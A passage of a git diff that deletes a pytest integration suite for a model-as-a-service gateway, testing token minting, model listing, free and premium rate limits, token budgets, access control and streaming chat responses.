-def model_name():
-    return MODEL_NAME
-
-@pytest.fixture(scope="session")
-def http() -> requests.Session:
-    s = requests.Session()
-    # Default verify=True; allow opt-out via env; allow custom CA path if provided
-    verify_default = True
-    verify_env = _env_bool("REQUESTS_VERIFY", True)
-    verify: bool | str = verify_env
-    if INGRESS_CA_PATH and os.path.exists(INGRESS_CA_PATH):
-        # If a CA bundle is provided, prefer it (typical for OpenShift HTTPS ingress)
-        verify = INGRESS_CA_PATH
-    else:
-        verify = verify_env if verify_env is not None else verify_default
-    s.verify = verify
-    return s
-
-# -------------------------- HTTP helpers -----------------------------
-
-def http_get(http: requests.Session, url: str, headers=None, timeout=60):
-    r = http.get(url, headers=headers or {}, timeout=timeout)
-    try:
-        body = r.json()
-    except Exception:
-        body = r.text
-    return r.status_code, body, r
-
-def http_post(http: requests.Session, url: str, headers=None, json=None, data=None, timeout=60):
-    r = http.post(url, headers=headers or {}, json=json, data=data, timeout=timeout)
-    try:
-        body = r.json()
-    except Exception:
-        body = r.text
-    return r.status_code, body, r
-
-def bearer(tok: str) -> dict:
-    return {"Authorization": f"Bearer {tok}"} if tok else {}
-
-# -------------------------- Token mint/revoke ------------------------
-
-def _looks_like_jwt(tok: str) -> bool:
-    parts = tok.split(".")
-    if len(parts) != 3:
-        return False
-    try:
-        base64.urlsafe_b64decode(parts[0] + "===")
-        base64.urlsafe_b64decode(parts[1] + "===")
-        return True
-    except Exception:
-        return False
-
-def _try_mint_maas_key(http: requests.Session, base_url: str, oc_user_token: str, minutes=10) -> str | None:
-    """
-    Try several permutations commonly seen across clusters:
-    - POST /v1/tokens and /tokens
-    - with bodies: {"ttl": "10m"}, {"expiration": "10m"}, {}, and no body
-    Return the minted token or None if not available.
-    """
-    eps = ["/v1/tokens", "/tokens"]
-    bodies = [{"ttl": f"{minutes}m"}, {"expiration": f"{minutes}m"}, {}, None]
-    for ep in eps:
-        url = f"{base_url.rstrip('/')}{ep}"
-        for body in bodies:
-            try:
-                r = http.post(url, headers=bearer(oc_user_token), json=body, timeout=60)
-            except Exception:
-                continue
-            if r.status_code in (200, 201):
-                try:
-                    j = r.json()
-                    tok = j.get("token") or j.get("access_token")
-                    if tok:
-                        return tok
-                except Exception:
-                    pass
-            if r.status_code in (404, 405):
-                # endpoint not present or method not allowed → try next ep
-                break
-    return None
-
-def mint_maas_key(http: requests.Session, base_url: str, oc_user_token: str, minutes=10) -> str:
-    tok = _try_mint_maas_key(http, base_url, oc_user_token, minutes=minutes)
-    if tok:
-        return tok
-    raise AssertionError("Could not mint a MaaS key with any common body/endpoint variant")
-
-def revoke_maas_key(http: requests.Session, base_url: str, oc_user_token: str, token: str | None = None):
-    # Some clusters revoke by calling DELETE on the token endpoint (token not always needed)
-    last = None
-    for ep in ("/v1/tokens", "/tokens"):
-        url = f"{base_url.rstrip('/')}{ep}"
-        try:
-            last = http.delete(url, headers=bearer(oc_user_token), timeout=60)
-        except Exception:
-            continue
-        if last.status_code in (200, 202, 204):
-            return last
-    return last
-
-def ensure_free_key(http: requests.Session) -> str:
-    """
-    Preferred: a minted MaaS JWT. Fallback: the OC token (if cluster accepts Bearer OC).
-    """
-    assert FREE_OC_TOKEN, "FREE_OC_TOKEN not set (export your current user's oc token)"
-    assert BASE_URL, "MAAS_API_BASE_URL not set"
-    minted = _try_mint_maas_key(http, BASE_URL, FREE_OC_TOKEN, minutes=10)
-    if minted and _looks_like_jwt(minted):
-        return minted
-    return FREE_OC_TOKEN
-
-def ensure_premium_key(http: requests.Session) -> str:
-    """
-    Preferred: a minted MaaS JWT. Fallback: the OC token (if cluster accepts Bearer OC).
-    """
-    assert PREMIUM_OC_TOKEN, "PREMIUM_OC_TOKEN not set (export your premium user's oc token)"
-    assert BASE_URL, "MAAS_API_BASE_URL not set"
-    minted = _try_mint_maas_key(http, BASE_URL, PREMIUM_OC_TOKEN, minutes=10)
-    if minted and _looks_like_jwt(minted):
-        return minted
-    return PREMIUM_OC_TOKEN
-
-@pytest.fixture
-def maas_key(http: requests.Session):
-    return ensure_free_key(http)
-
-# -------------------------- Usage headers helper ---------------------
-
-def parse_usage_headers(resp) -> dict:
-    out = {}
-    for h in USAGE_HEADERS:
-        v = resp.headers.get(h) or resp.headers.get(h.title())
-        if v is not None:
-            try:
-                out[h] = int(v)
-            except Exception:
-                out[h] = v
-    return out
-
-# -------------------------- Cluster policy discovery -----------------
-
-def _get_json(ns: str, kind: str, name: str):
-    try:
-        out = subprocess.run(
-            ["oc", "-n", ns, "get", kind, name, "-o", "json"],
-            capture_output=True, text=True, check=True
-        ).stdout
-        return json.loads(out)
-    except Exception:
-        return {}
-
-def _first_existing(ns: str, kinds: list[str], name: str):
-    for k in kinds:
-        d = _get_json(ns, k, name)
-        if d:
-            return d
-    return {}
-
-def policy_from_cluster():
-    # Try both API groups for each CRD
-    rlp = _first_existing(
-        "openshift-ingress",
-        ["ratelimitpolicies.gateway.networking.k8s.io",
-         "ratelimitpolicies.kuadrant.io"],
-        "gateway-rate-limits",
-    )
-    trlp = _first_existing(
-        "openshift-ingress",
-        ["tokenratelimitpolicies.gateway.networking.k8s.io",
-         "tokenratelimitpolicies.kuadrant.io"],
-        "gateway-default-deny",
-    )
-    return {
-        "free_burst":     (rlp or {}).get("spec", {}).get("limits", {}).get("free", {}).get("rates", [{}])[0].get("limit"),
-        "premium_burst":  (rlp or {}).get("spec", {}).get("limits", {}).get("premium", {}).get("rates", [{}])[0].get("limit"),
-        "free_tokens":    (trlp or {}).get("spec", {}).get("limits", {}).get("free-user-tokens", {}).get("rates", [{}])[0].get("limit"),
-        "premium_tokens": (trlp or {}).get("spec", {}).get("limits", {}).get("premium-user-tokens", {}).get("rates", [{}])[0].get("limit"),
-    }
-
-POLICY = policy_from_cluster()
-
-def get_limit(env_name: str, fallback_key: str, default_val):
-    """
-    Prefer env override → then cluster policy (POLICY[fallback_key]) → default.
-    Examples:
-      get_limit("RATE_LIMIT_BURST_FREE", "free_burst", 16)
-      get_limit("RATE_LIMIT_BURST_PREMIUM", "premium_burst", 32)
-      get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000)
-      get_limit("TOKEN_LIMIT_PREMIUM", "premium_tokens", 2000)
-    """
-    v = os.getenv(env_name)
-    if v:
-        try:
-            return int(v)
-        except Exception:
-            return default_val
-    return POLICY.get(fallback_key) or default_val
-
-# --- new: tool-calling -
-
-@pytest.fixture(scope="session")
-def tool_calling_enabled() -> bool:
-    return os.getenv("TOOL_CALLING_ENABLED", "false").lower() in ("1","true","yes")
-
-# @pytest.fixture(scope="session")
-# def tools_spec():
-#     return [
-#         {
-#             "type": "function",
-#             "function": {
-#                 "name": "get_weather",
-#                 "description": "Get current weather for a city/location.",
-#                 "parameters": {
-#                     "type": "object",
-#                     "properties": {
-#                         "city": {"type": "string"},
-#                         "location": {"type": "string"},
-#                         "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]},
-#                     },
-#                     "required": ["location"],
-#                     "additionalProperties": False,
-#                 },
-#             },
-#         }
-#     ]
-
-@pytest.fixture(scope="session")
-def tools_spec():
-    return [
-        {
-            "type": "function",
-            "function": {
-                "name": "get_weather",
-                "description": "Get current weather for a city/location.",
-                "parameters": {
-                    "type": "object",
-                    "properties": {
-                        "location": {"type": "string", "description": "City name, e.g. Boston, MA"},
-                        "city": {"type": "string", "description": "City name (legacy alias)"},
-                        "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}
-                    },
-                    "required": ["location"],
-                    "additionalProperties": False
-                },
-            },
-        }
-    ]
diff --git a/test/maas_billing_tests_independent/tests/run-billing-tests.sh b/test/maas_billing_tests_independent/tests/run-billing-tests.sh
deleted file mode 100644
index 10efaa88a..000000000
--- a/test/maas_billing_tests_independent/tests/run-billing-tests.sh
+++ /dev/null
@@ -1,42 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-# Where this script lives (…/maas_billing_tests_independent/tests)
-SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
-
-# Project root for this test suite (…/maas_billing_tests_independent)
-SUITE_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
-
-# Artifacts live inside the test suite folder
-ARTIFACTS_DIR="${SUITE_ROOT}/artifacts"
-
-# Timestamped run folder so each run is isolated
-RUN_DIR="${ARTIFACTS_DIR}/$(date +%F_%H-%M-%S)"
-
-mkdir -p "${RUN_DIR}"
-
-echo "👉 Writing reports to: ${RUN_DIR}"
-
-# Optional: honour a venv if you're already inside one
-if [[ -z "${VIRTUAL_ENV:-}" ]]; then
-  echo "ℹ️  No active virtualenv detected. Using system Python."
-else
-  echo "✅ Using virtualenv: ${VIRTUAL_ENV}"
-fi
-
-# You can pass extra pytest args, e.g. -k "smoke" or -x
-EXTRA_ARGS=("$@")
-
-# Run only this suite’s tests
-pytest \
-  "${SCRIPT_DIR}" \
-  --maxfail=0 \
-  --html="${RUN_DIR}/maas-test-report.html" --self-contained-html \
-  --junitxml="${RUN_DIR}/maas-test-report.xml" \
-  -o log_cli=true --log-cli-level=INFO \
-  "${EXTRA_ARGS[@]}"
-
-echo
-echo "✅ Done."
-echo "📄 HTML:  ${RUN_DIR}/maas-test-report.html"
-echo "🧾 JUnit: ${RUN_DIR}/maas-test-report.xml"
diff --git a/test/maas_billing_tests_independent/tests/test_gateway_endpoints.py b/test/maas_billing_tests_independent/tests/test_gateway_endpoints.py
deleted file mode 100644
index 87a85cbfc..000000000
--- a/test/maas_billing_tests_independent/tests/test_gateway_endpoints.py
+++ /dev/null
@@ -1,51 +0,0 @@
-# Test: Chat completion works end-to-end via the Gateway
-# 1) GET {base_url}/v1/models with a MaaS token -> expect 200
-# 2) Find the target model and its direct "url" from the payload
-# 3) POST {model_url}/v1/chat/completions (NOT under /maas-api)
-#    -> expect 200/201 and a JSON body with "choices" or "output"
-
-import os
-import time
-from conftest import bearer  # via_gateway removed
-
-def test_chat_completion_works(http, base_url, model_name, maas_key):
-    # 1) Model catalog
-    models_resp = http.get(
-        f"{base_url}/v1/models",
-        headers=bearer(maas_key),
-        timeout=30,
-    )
-    assert models_resp.status_code == 200, (
-        f"models list failed: {models_resp.status_code} {models_resp.text[:200]}"
-    )
-
-    body = models_resp.json()
-    items = body.get("data") or body.get("models") or []
-
-    # 2) Find our model
-    target = next(
-        (m for m in items if m.get("id") == model_name or m.get("name") == model_name),
-        None,
-    )
-    assert target, f"model {model_name!r} not found in /v1/models payload"
-
-    # Use the catalog's model URL directly (no rewrite)
-    model_url = target["url"]
-
-    payload = {
-        "model": model_name,
-        "messages": [{"role": "user", "content": "hello"}],
-        "temperature": 0,
-    }
-
-    # 3) Call chat/completions (allow a single retry if the window is still hot)
-    r = http.post(f"{model_url}/v1/chat/completions",
-                  headers=bearer(maas_key), json=payload, timeout=60)
-    if r.status_code == 429:
-        time.sleep(float(os.getenv("RATE_WINDOW_WAIT", "3")))
-        r = http.post(f"{model_url}/v1/chat/completions",
-                      headers=bearer(maas_key), json=payload, timeout=60)
-
-    assert r.status_code in (200, 201), f"{r.status_code} {r.text[:200]}"
-    j = r.json()
-    assert ("choices" in j and j["choices"]) or ("output" in j), f"unexpected response: {j}"
diff --git a/test/maas_billing_tests_independent/tests/test_limits_interplay.py b/test/maas_billing_tests_independent/tests/test_limits_interplay.py
deleted file mode 100644
index 1f4a23d52..000000000
--- a/test/maas_billing_tests_independent/tests/test_limits_interplay.py
+++ /dev/null
@@ -1,74 +0,0 @@
-# Tests rate vs token limits.
-# 1) test_request_limit_before_token_limit → many small fast requests → expect 429 (rate limit).
-# 2) test_token_limit_before_request_limit → few large token requests → expect 429 (token limit).
-# Failures usually mean limits not applied or too high to trigger.
-
-import os, time, pytest
-from conftest import bearer, ensure_free_key, get_limit
-
-def _url(http, base_url, key, model_name):
-    r = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30)
-    assert r.status_code == 200
-    items = (r.json().get("data") or r.json().get("models") or [])
-    m = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None)
-    assert m and m.get("url")
-    return m["url"]
-
-def _post(http, url, model, key, tokens):
-    return http.post(
-        f"{url}/v1/chat/completions",
-        headers=bearer(key),
-        json={
-            "model": model,
-            "messages": [{"role": "user", "content": "ping"}],
-            "max_tokens": tokens,
-            "temperature": 0,
-        },
-        timeout=60,
-    )
-
-@pytest.mark.skipif(not os.getenv("FREE_OC_TOKEN"), reason="FREE_OC_TOKEN not set")
-def test_request_limit_before_token_limit(http, base_url, model_name):
-    key    = ensure_free_key(http)
-    url    = _url(http, base_url, key, model_name)
-    burst  = get_limit("RATE_LIMIT_BURST", "free_burst", 16)
-    budget = get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000)
-
-    per_call = int(os.getenv("TOKENS_PER_CALL_SMALL", "8"))  # “cheap”
-    calls    = burst + 5
-    sleep_s  = float(os.getenv("BURST_SLEEP", "0.05"))
-    codes    = []
-    for _ in range(calls):
-        r = _post(http, url, model_name, key, per_call)
-        codes.append(r.status_code)
-        if r.status_code == 429:
-            break
-        time.sleep(sleep_s)
-
-    assert any(c == 429 for c in codes), f"no 429 seen; codes={codes}"
-    # Optional sanity: cheap calls should not have crossed token budget first
-
-@pytest.mark.skipif(not os.getenv("FREE_OC_TOKEN"), reason="FREE_OC_TOKEN not set")
-def test_token_limit_before_request_limit(http, base_url, model_name):
-    key    = ensure_free_key(http)
-    url    = _url(http, base_url, key, model_name)
-    burst  = get_limit("RATE_LIMIT_BURST", "free_burst", 16)
-    budget = get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000)
-
-    calls    = min(burst - 1, 5) if burst > 1 else 1  # stay under burst
-    per_call = max(64, (budget // max(calls, 1)) + 64)  # “expensive”
-    sleep_s  = float(os.getenv("BURST_SLEEP", "0.05"))
-    codes    = []
-    for _ in range(calls):
-        r = _post(http, url, model_name, key, per_call)
-        codes.append(r.status_code)
-        if r.status_code == 429:
-            break
-        time.sleep(sleep_s)
-
-    # If budget wasn’t yet crossed, send one more to push it over
-    if 429 not in codes:
-        r = _post(http, url, model_name, key, per_call)
-        codes.append(r.status_code)
-
-    assert any(c == 429 for c in codes), f"no 429 seen; codes={codes}"
diff --git a/test/maas_billing_tests_independent/tests/test_maas_api_mint_and_models.py b/test/maas_billing_tests_independent/tests/test_maas_api_mint_and_models.py
deleted file mode 100644
index 336244738..000000000
--- a/test/maas_billing_tests_independent/tests/test_maas_api_mint_and_models.py
+++ /dev/null
@@ -1,19 +0,0 @@
-# Verifies basic MaaS API health:
-# 1) test_mint_token → we can mint an auth token (looks like a long JWT).
-# 2) test_list_models_exposes_urls → /v1/models returns a list and each model
-#    entry includes a usable endpoint/URL (or at least id/endpoint fields).
-# If these fail, the control-plane (token mint) or catalog (models/URLs) is broken.
-
-from conftest import bearer
-
-def test_mint_token(maas_key):
-    assert isinstance(maas_key, str) and len(maas_key) > 100
-
-def test_list_models_exposes_urls(http, base_url, maas_key):
-    r = http.get(f"{base_url}/v1/models", headers=bearer(maas_key))
-    assert r.status_code == 200, r.text[:200]
-    j = r.json()
-    data = j.get("data") or j.get("models") or []
-    assert isinstance(data, list) and data
-    item = data[0] if data else {}
-    assert isinstance(item, dict) and any(k in item for k in ("url", "endpoint", "id"))
diff --git a/test/maas_billing_tests_independent/tests/test_models_user.py b/test/maas_billing_tests_independent/tests/test_models_user.py
deleted file mode 100644
index 38b26b20a..000000000
--- a/test/maas_billing_tests_independent/tests/test_models_user.py
+++ /dev/null
@@ -1,11 +0,0 @@
-# Smoke-check: catalog endpoint is reachable and shaped correctly.
-# - Calls /v1/models with a valid token.
-# - Expects HTTP 200 and a JSON body that has either "data" or "models".
-# If this fails, the MaaS API or its model catalog is unavailable/misconfigured.
-
-from conftest import bearer
-
-def test_models_user(http, base_url, maas_key):
-    r = http.get(f"{base_url}/v1/models", headers=bearer(maas_key))
-    assert r.status_code == 200, r.text[:200]
-    assert "data" in r.json() or "models" in r.json()
diff --git a/test/maas_billing_tests_independent/tests/test_quota_global.py b/test/maas_billing_tests_independent/tests/test_quota_global.py
deleted file mode 100644
index 0a1a67ff9..000000000
--- a/test/maas_billing_tests_independent/tests/test_quota_global.py
+++ /dev/null
@@ -1,49 +0,0 @@
-# Validates Free-tier request *rate* limiting works:
-# - Sends N quick /v1/chat/completions
-# - Expects at least one 429
-# - If burst is known, expects >= burst successes before 429s
-
-import os, time
-from conftest import bearer, ensure_free_key, get_limit
-
-def test_rate_limit_burst(http, base_url, model_name):
-    key = ensure_free_key(http)
-
-    # Discover configured burst if available
-    burst = get_limit("RATE_LIMIT_BURST_FREE", "free_burst", None)
-
-    # Discover the model URL once
-    models = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30)
-    assert models.status_code == 200, f"/v1/models failed: {models.status_code} {models.text[:200]}"
-    body = models.json()
-    items = body.get("data") or body.get("models") or []
-    target = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None)
-    assert target and target.get("url"), f"model {model_name!r} not found or missing url"
-
-    # Use the catalog's model URL directly
-    model_url = target["url"]
-
-    # Choose N: just above burst if known, else a safe default
-    N = (burst + 5) if burst is not None else int(os.getenv("GLOBAL_BURST_N", "25"))
-
-    per_call_tokens = int(os.getenv("TOKENS_PER_CALL_SMALL", "16"))
-    sleep_s = float(os.getenv("BURST_SLEEP", "0.05"))
-
-    codes = []
-    for _ in range(N):
-        r = http.post(
-            f"{model_url}/v1/chat/completions",
-            headers=bearer(key),
-            json={"model": model_name, "messages": [{"role": "user", "content": "hi"}],
-                  "max_tokens": per_call_tokens, "temperature": 0},
-            timeout=60,
-        )
-        codes.append(r.status_code)
-        time.sleep(sleep_s)
-
-    ok = sum(c in (200, 201) for c in codes)
-    rl = sum(c == 429 for c in codes)
-
-    assert rl >= 1, f"expected at least one 429 after burst; codes={codes}"
-    if burst is not None:
-        assert ok >= burst, f"expected >= {burst} successes before limiting; got {ok}, codes={codes}"
diff --git a/test/maas_billing_tests_independent/tests/test_quota_per_user.py b/test/maas_billing_tests_independent/tests/test_quota_per_user.py
deleted file mode 100644
index c2763e201..000000000
--- a/test/maas_billing_tests_independent/tests/test_quota_per_user.py
+++ /dev/null
@@ -1,81 +0,0 @@
-"""
-Purpose: Compare Free vs Premium *request-rate* behavior for the same model.
-Result: Premium should be >= Free (not more restricted).
-
-We do not require any env tuning:
-- We'll try to discover bursts from the cluster. If unavailable, we simply pick N large
-  enough by default so both tiers should hit the limiter at least once.
-
-Example:
-- Free burst = 8, Premium burst = 16
-- N = burst(max) + 5 requests per user
-  Free: first 8 → 200, later → 429  => free_ok = 8
-  Premium: first 16 → 200, later → 429 => prem_ok = 16
-- Assertion: prem_ok >= free_ok  (Premium is not worse than Free)
-
-If both tiers allow ≥ N, you'll see free_ok = prem_ok = N → PASS (still correct).
-If Premium were lower than Free, prem_ok < free_ok → FAIL.
-"""
-
-import os, pytest, time
-from conftest import bearer, ensure_free_key, ensure_premium_key, get_limit
-
-@pytest.mark.skipif(not os.getenv("PREMIUM_OC_TOKEN"), reason="PREMIUM_OC_TOKEN not set")
-def test_free_vs_premium_quota(http, base_url, model_name):
-    free_key = ensure_free_key(http)
-    prem_key = ensure_premium_key(http)
-
-    # Discover the model URL once (either key works)
-    models = http.get(f"{base_url}/v1/models", headers=bearer(free_key), timeout=30).json()
-    items = models.get("data") or models.get("models") or []
-    target = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None)
-    assert target and target.get("url"), f"model {model_name!r} not found or missing 'url'"
-    model_url = target["url"]
-
-    # Bursts (env -> RLP -> None)
-    free_burst = get_limit("RATE_LIMIT_BURST_FREE", "free_burst", None)
-    prem_burst = get_limit("RATE_LIMIT_BURST_PREMIUM", "premium_burst", None)
-
-    # Pick N slightly above the larger known burst; if unknown, default to 25
-    if free_burst is not None or prem_burst is not None:
-        N_default = max(free_burst or 0, prem_burst or 0) + 5
-    else:
-        N_default = 25
-    N = int(os.getenv("N_BURST", str(N_default)))
-
-    # Keep calls "cheap" so token-rate limiter does not trip here
-    per_call_tokens = int(os.getenv("TOKENS_PER_CALL_SMALL", "16"))
-    sleep_s        = float(os.getenv("BURST_SLEEP", "0.05"))
-
-    def run(key):
-        ok = 0
-        rl = 0
-        for _ in range(N):
-            r = http.post(
-                f"{model_url}/v1/chat/completions",
-                headers=bearer(key),
-                json={
-                    "model": model_name,
-                    "messages": [{"role": "user", "content": "hi"}],
-                    "max_tokens": per_call_tokens,
-                    "temperature": 0,
-                },
-                timeout=60,
-            )
-            if r.status_code in (200, 201):
-                ok += 1
-            elif r.status_code == 429:
-                rl += 1
-            time.sleep(sleep_s)
-        return ok, rl
-
-    free_ok, free_rl = run(free_key)
-    prem_ok, prem_rl = run(prem_key)
-
-    # Both tiers should hit limiter at least once if N is large enough
-    assert free_rl >= 1 or prem_rl >= 1, (
-        f"no 429 seen; increase N_BURST (now {N}) or check rate-limits. "
-        f"free_ok={free_ok}, free_rl={free_rl}, prem_ok={prem_ok}, prem_rl={prem_rl}"
-    )
-    # Core expectation: premium is not worse than free
-    assert prem_ok >= free_ok, f"premium_ok={prem_ok} < free_ok={free_ok}"
diff --git a/test/maas_billing_tests_independent/tests/test_rbac.py b/test/maas_billing_tests_independent/tests/test_rbac.py
deleted file mode 100644
index c8614cd58..000000000
--- a/test/maas_billing_tests_independent/tests/test_rbac.py
+++ /dev/null
@@ -1,6 +0,0 @@
-from conftest import bearer
-
-def test_user_cannot_list_admin_keys(http, base_url, maas_key):
-    r = http.get(f"{base_url}/v1/keys", headers=bearer(maas_key))
-    if r.status_code != 404:
-        assert r.status_code in (401, 403)
diff --git a/test/maas_billing_tests_independent/tests/test_streaming_chat.py b/test/maas_billing_tests_independent/tests/test_streaming_chat.py
deleted file mode 100644
index 334608452..000000000
--- a/test/maas_billing_tests_independent/tests/test_streaming_chat.py
+++ /dev/null
@@ -1,103 +0,0 @@
-import os, json, shlex, subprocess, pytest
-
-# Enable extra logs in report/console when STREAMING_DEBUG=1|true|yes
-DEBUG = os.getenv("STREAMING_DEBUG", "false").lower() in ("1", "true", "yes")
-
-@pytest.mark.skipif(
-    os.getenv("STREAMING_ENABLED", "false").lower() not in ("1", "true", "yes"),
-    reason="Streaming test not enabled for this environment",
-)
-def test_chat_completions_streaming(http, base_url, model_name):
-    # 1) Mint MaaS token
-    oc_token = subprocess.check_output(shlex.split("oc whoami -t"), text=True).strip()
-    r = http.post(
-        f"{base_url}/v1/tokens",
-        headers={"Authorization": f"Bearer {oc_token}", "Content-Type": "application/json"},
-        json={"expiration": "20m"},
-        timeout=30,
-    )
-    assert r.status_code in (200, 201), "Token mint failed"
-    token = r.json()["token"]
-
-    # 2) Discover model URL  ← make sure everything below is indented inside the function
-    r = http.get(f"{base_url}/v1/models", headers={"Authorization": f"Bearer {token}"}, timeout=30)
-    assert r.status_code == 200, "Models list failed"
-    models = r.json()["data"]
-    model_entry = next((m for m in models if m["id"] == model_name), None)
-    assert model_entry, f"Model {model_name} not found in /v1/models"
-
-    chat_url = (model_entry.get("url") or "").rstrip("/")
-    assert chat_url, "Model entry has no 'url'"
-    if not chat_url.endswith("/v1/chat/completions"):
-        chat_url = f"{chat_url}/v1/chat/completions"
-    if DEBUG:
-        print(f"[streaming] chat_url={chat_url}")
-
-    # 3) Streaming request payload
-    payload = {
-        "model": model_name,
-        "messages": [
-            {"role": "system", "content": "You are concise."},
-            {"role": "user", "content": "Say one short sentence about Texas Weather (just a sentence)."},
-        ],
-        "stream": True,
-        "max_tokens": 20,
-        "temperature": 0,
-    }
-
-    r = http.post(
-        chat_url,
-        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
-        json=payload,
-        timeout=90,
-        stream=True,
-    )
-    # 4) Validate SSE and reconstruct text
-    assert r.status_code == 200, "Streaming call failed"
-    ctype = (r.headers.get("content-type") or r.headers.get("Content-Type") or "").lower()
-    assert "text/event-stream" in ctype, f"Unexpected Content-Type: {ctype}"
-    if DEBUG:
-        print(f"[streaming] content-type={ctype}")
-
-    saw_done = False
-    saw_json = False
-    chunks: list[str] = []
-
-    for raw in r.iter_lines(decode_unicode=True):
-        if not raw:
-            continue
-        if DEBUG:
-            print(f"[sse] {raw}")
-        if not raw.startswith("data:"):
-            continue
-
-        data = raw[5:].strip()
-        if data == "[DONE]":
-            saw_done = True
-            break
-
-        try:
-            j = json.loads(data)
-            saw_json = True
-            ch = (j.get("choices") or [{}])[0]
-            # OpenAI-style SSE frames: choices[].delta.{content|role}
-            delta = ch.get("delta") or (ch.get("message") if "message" in ch else {}) or {}
-            piece = delta.get("content") or ""
-            if isinstance(piece, str) and piece:
-                chunks.append(piece)
-                if DEBUG:
-                    print(f"[chunk {len(chunks):02d}] {piece!r}")
-        except Exception as e:
-            if DEBUG:
-                print(f"[sse] JSON parse error: {e}")
-
-    text = "".join(chunks).strip()
-    if DEBUG:
-        print("\n[streaming] ✅ Stream completed" if saw_done else "\n[streaming] ⚠️ No [DONE] seen")
-        print(f"[streaming] ✅ Received {len(chunks)} chunks")
-        print(f"[streaming] ✅ Final text: {text!r}\n")
-
-    assert saw_json, "No JSON streaming frames received."
-    assert saw_done, "Missing SSE terminator [DONE]."
-    assert text, "Reconstructed streamed content is empty."
-    assert len(text) >= 5, f"Streamed content too short: '{text}'"
diff --git a/test/maas_billing_tests_independent/tests/test_token_ratelimit.py b/test/maas_billing_tests_independent/tests/test_token_ratelimit.py
deleted file mode 100644
index cbc8466e0..000000000
--- a/test/maas_billing_tests_independent/tests/test_token_ratelimit.py
+++ /dev/null
@@ -1,94 +0,0 @@
-# Verifies the *token* budget limiter for the Free tier.
-# Flow:
-# 1) Discover model URL from /v1/models.
-# 2) Send a few “expensive” chat/completions calls (large max_tokens) so we
-#    stay under the request-rate burst but exceed the Free token budget.
-# 3) Expect to see a 429 once the cumulative tokens cross the budget.
-# Notes:
-# - Reads token budget/burst from cluster (with env overrides).
-# - If usage headers aren’t exposed, the test skips (can’t measure tokens).
-
-import os, time, pytest
-from conftest import bearer, ensure_free_key, get_limit
-
-USAGE_HEADERS = (
-    "x-odhu-usage-total-tokens",
-    "x-odhu-usage-input-tokens",
-    "x-odhu-usage-output-tokens",
-)
-
-def _model_url(http, base_url, key, model_name):
-    r = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30)
-    assert r.status_code == 200, f"/v1/models failed: {r.status_code} {r.text[:200]}"
-    items = (r.json().get("data") or r.json().get("models") or [])
-    hit = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None)
-    assert hit and hit.get("url"), f"model {model_name!r} not found or missing url"
-    return hit["url"]
-
-def _tokens_used(h):
-    tot = h.get("x-odhu-usage-total-tokens")
-    if tot:
-        try:
-            return int(tot)
-        except:
-            pass
-    try:
-        return int(h.get("x-odhu-usage-input-tokens") or 0) + int(h.get("x-odhu-usage-output-tokens") or 0)
-    except:
-        return 0
-
-@pytest.mark.skipif(not os.getenv("FREE_OC_TOKEN"), reason="FREE_OC_TOKEN not set")
-def test_free_token_budget_enforced(http, base_url, model_name):
-    key = ensure_free_key(http)
-    url = _model_url(http, base_url, key, model_name)
-
-    # Pull limits from cluster, allow env override
-    token_budget = get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000)
-    burst        = get_limit("RATE_LIMIT_BURST", "free_burst", 16)
-
-    # Shape traffic so we stay under request burst but exceed token budget
-    calls    = min(burst - 1, 5) if burst > 1 else 1
-    per_call = max(64, (token_budget // max(calls, 1)) + 64)  # “expensive” calls
-    sleep_s  = float(os.getenv("BURST_SLEEP", "0.05"))
-
-    consumed, codes = 0, []
-    for _ in range(calls):
-        r = http.post(
-            f"{url}/v1/chat/completions",
-            headers=bearer(key),
-            json={
-                "model": model_name,
-                "messages": [{"role": "user", "content": "Repeat X 500 times."}],
-                "max_tokens": per_call,
-                "temperature": 0,
-            },
-            timeout=60,
-        )
-        codes.append(r.status_code)
-        if r.status_code in (200, 201):
-            if not any(h in r.headers for h in USAGE_HEADERS):
-                pytest.skip("Usage headers not present; token accounting disabled on this cluster.")
-            consumed += _tokens_used(r.headers)
-            if consumed >= token_budget:
-                # Fire one extra to observe 429 due to token limit
-                time.sleep(sleep_s)
-                r2 = http.post(
-                    f"{url}/v1/chat/completions",
-                    headers=bearer(key),
-                    json={
-                        "model": model_name,
-                        "messages": [{"role": "user", "content": "Repeat X 500 times."}],
-                        "max_tokens": per_call,
-                        "temperature": 0,
-                    },
-                    timeout=60,
-                )
-                codes.append(r2.status_code)
-                break
-        else:
-            break
-        time.sleep(sleep_s)
-
-    assert any(c == 429 for c in codes), (
-        f"never hit token limiter; budget={token_budget}, consumed={consumed}, codes={codes}"
-    )
diff --git a/test/maas_billing_tests_independent/tests/test_tokens.py b/test/maas_billing_tests_independent/tests/test_tokens.py
deleted file mode 100644
index 7fd4d72f9..000000000
--- a/test/maas_billing_tests_independent/tests/test_tokens.py
+++ /dev/null
@@ -1,96 +0,0 @@
-# ============================
-# What this file tests (short)
-# ============================
-# - We can mint MaaS tokens and they look like real JWTs.
-# - The minted token actually works to call /v1/models.
-# - Bad TTL input is rejected with 400.
-# - After we revoke a token, it stops working.
-# - Model responses include usage headers (token counts).
-
-from conftest import bearer, parse_usage_headers, USAGE_HEADERS, ensure_free_key
-import json, base64
-
-def _b64url_decode(s):
-    pad = "=" * (-len(s) % 4)
-    return base64.urlsafe_b64decode((s + pad).encode("utf-8"))
-
-def test_minted_token_is_jwt(maas_key):
-    parts = maas_key.split(".")
-    assert len(parts) == 3
-    hdr = json.loads(_b64url_decode(parts[0]).decode("utf-8"))
-    assert isinstance(hdr, dict)
-
-def test_tokens_issue_201_and_schema(http, base_url):
-    from conftest import FREE_OC_TOKEN, mint_maas_key, bearer as bh
-    # mint_maas_key returns a single string (the MaaS key)
